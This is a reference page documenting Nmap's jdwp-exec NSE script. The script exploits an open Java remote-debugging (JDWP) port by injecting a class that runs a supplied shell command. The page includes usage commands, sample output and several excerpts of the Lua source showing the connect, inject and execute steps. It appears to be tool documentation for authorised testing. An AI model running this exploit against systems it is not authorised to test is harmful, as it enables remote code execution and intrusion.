Nmap jdwp-exec NSE Script


This page contains detailed information about how to use the jdwp-exec NSE script. For list of all NSE scripts, visit the Nmap NSE Library.

Select:
Overview
Error Messages

Script Overview

Script source code: https://github.com/nmap/nmap/tree/master/scripts/jdwp-exec.nse
Script categories: exploit, intrusive
Target service / protocol: tcp
Target network port(s): any
List of CVEs: -

Script Description

The jdwp-exec.nse script attempts to exploit java's remote debugging port. When remote debugging port is left open, it is possible to inject java bytecode and achieve remote code execution. This script abuses this to inject and execute a Java class file that executes the supplied shell command and returns its output.

The script injects the JDWPSystemInfo class from nselib/jdwp-class/ and executes its run() method which accepts a shell command as its argument.

Jdwp-exec NSE Script Arguments

This is a full list of arguments supported by the jdwp-exec.nse script:

jdwp-exec.cmd

Command to execute on the remote system.

- - -
To use this script argument, add it to Nmap command line like in this example:

nmap --script=jdwp-exec --script-args jdwp-exec.cmd=value <target>

Jdwp-exec NSE Script Example Usage

Here's an example of how to use the jdwp-exec.nse script:

nmap -sT <target> -p <port> --script=+jdwp-exec --script-args cmd="date"

Jdwp-exec NSE Script Example Output

Here's a sample output from the jdwp-exec.nse script:

PORT     STATE SERVICE REASON
2010/tcp open  search  syn-ack
| jdwp-exec:
|   date output:
|   Sat Aug 11 15:27:21 Central European Daylight Time 2012
|_

Jdwp-exec NSE Script Example XML Output

There is no sample XML output for this module. However, by providing the -oX <file> option, Nmap will produce a XML output and save it in the file.xml file.

Author

  • Aleksandar Nikolic

References

See Also

Related NSE scripts to the jdwp-exec.nse script:

Visit Nmap NSE Library for more scripts.

The jdwp-exec.nse script may fail with the following error messages. Check for the possible causes by using the code snippets highlighted below found in the script source code. This can often times help in identifying the root cause of the problem.

error, %s

Here is a relevant code snippet related to the "error, %s" error message:

45:	
46:	action = function(host, port)
47:	  stdnse.sleep(5) -- let the remote socket recover from connect() scan
48:	  local status,socket = jdwp.connect(host,port) -- initialize the connection
49:	  if not status then
50:	    stdnse.debug1("error, %s",socket)
51:	    return nil
52:	  end
53:	
54:	  -- read .class file
55:	  local file = io.open(nmap.fetchfile("nselib/data/jdwp-class/JDWPExecCmd.class"), "rb")

Failed to inject class

Here is a relevant code snippet related to the "Failed to inject class" error message:

58:	
59:	  -- inject the class
60:	  local injectedClass
61:	  status,injectedClass = jdwp.injectClass(socket,class_bytes)
62:	  if not status then
63:	    stdnse.debug1("Failed to inject class")
64:	    return stdnse.format_output(false, "Failed to inject class")
65:	  end
66:	  -- find injected class method
67:	  local runMethodID = jdwp.findMethod(socket,injectedClass.id,"run",false)
68:

Failed to inject class

Here is a relevant code snippet related to the "Failed to inject class" error message:

59:	  -- inject the class
60:	  local injectedClass
61:	  status,injectedClass = jdwp.injectClass(socket,class_bytes)
62:	  if not status then
63:	    stdnse.debug1("Failed to inject class")
64:	    return stdnse.format_output(false, "Failed to inject class")
65:	  end
66:	  -- find injected class method
67:	  local runMethodID = jdwp.findMethod(socket,injectedClass.id,"run",false)
68:	
69:	  if runMethodID == nil then

Couldn't find run method.

Here is a relevant code snippet related to the "Couldn't find run method." error message:

66:	  -- find injected class method
67:	  local runMethodID = jdwp.findMethod(socket,injectedClass.id,"run",false)
68:	
69:	  if runMethodID == nil then
70:	    stdnse.debug1("Couldn't find run method")
71:	    return stdnse.format_output(false, "Couldn't find run method.")
72:	  end
73:	  -- set run() method argument
74:	  local cmd = stdnse.get_script_args(SCRIPT_NAME .. '.cmd')
75:	  if cmd == nil then
76:	    return stdnse.format_output(false, "This script requires a cmd argument to be specified.")

This script requires a cmd argument to be specified.

Here is a relevant code snippet related to the "This script requires a cmd argument to be specified." error message:

71:	    return stdnse.format_output(false, "Couldn't find run method.")
72:	  end
73:	  -- set run() method argument
74:	  local cmd = stdnse.get_script_args(SCRIPT_NAME .. '.cmd')
75:	  if cmd == nil then
76:	    return stdnse.format_output(false, "This script requires a cmd argument to be specified.")
77:	  end
78:	  local cmdID
79:	  status,cmdID = jdwp.createString(socket,0,cmd)
80:	  if not status then
81:	    stdnse.debug1("Couldn't create string")

Version

This page has been created based on Nmap version 7.92.

Go back to menu.